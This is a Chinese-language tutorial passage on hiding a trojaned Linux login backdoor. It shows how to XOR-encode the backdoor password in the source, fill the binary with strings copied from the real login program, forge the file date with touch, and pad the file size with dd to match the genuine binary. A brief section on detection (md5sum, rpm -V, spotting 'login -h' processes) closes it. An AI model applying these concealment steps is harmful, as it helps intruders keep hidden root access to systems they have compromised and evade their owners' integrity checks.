黑客高级技巧 Linux后门技术及实践

\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb

3、在后门源代码中这样定义：

Char

login[]="\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

然后插入异或函数char *de（）结合同一magic串，就能判断出正确的后门密码。

用strings命令看不到密码、路径等字符串了。

最后的修饰

使后门程序ulogin的strings输出类似于正常login的strings输出，做法为：

在ulogin.c代码中增加一个字符串数组char strings[] ="";，在引号中填入正常login程序的strings输出结果。以假乱真，增加迷惑性。

调整后门程序的文件日期、大小等属性：

1、日期

# ls -l /sbin/xlogin

-r-sr-xr-x root root 19300 Feb 11 1998

/sbin/xlogin

# touch -t 199802110000 ulogin

# _

2、调整大小

# ls -l ulogin /sbin/xlogin

-r-sr-xr-x root root 7542 Feb 11 1998 ulogin

-r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin

# bc

19300-7542

11758

# dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1

1+0 records in

1+0 records out

11758 bytes transferred in 0.000379 secs (31016746

bytes/sec)

# cat /tmp/t >> ulogin

Login后门的检测

使用命令md5sum对现有/bin/login文件作校验，与以前的值作比较。

使用Red Hat Linux的RPM校验：

# rpm -V util-linux

在入侵者已经利用后门登录的情况下，who是看不到用户的，查看系统进程，查找login -h xxx.xxx.xxx.xxx的字样。()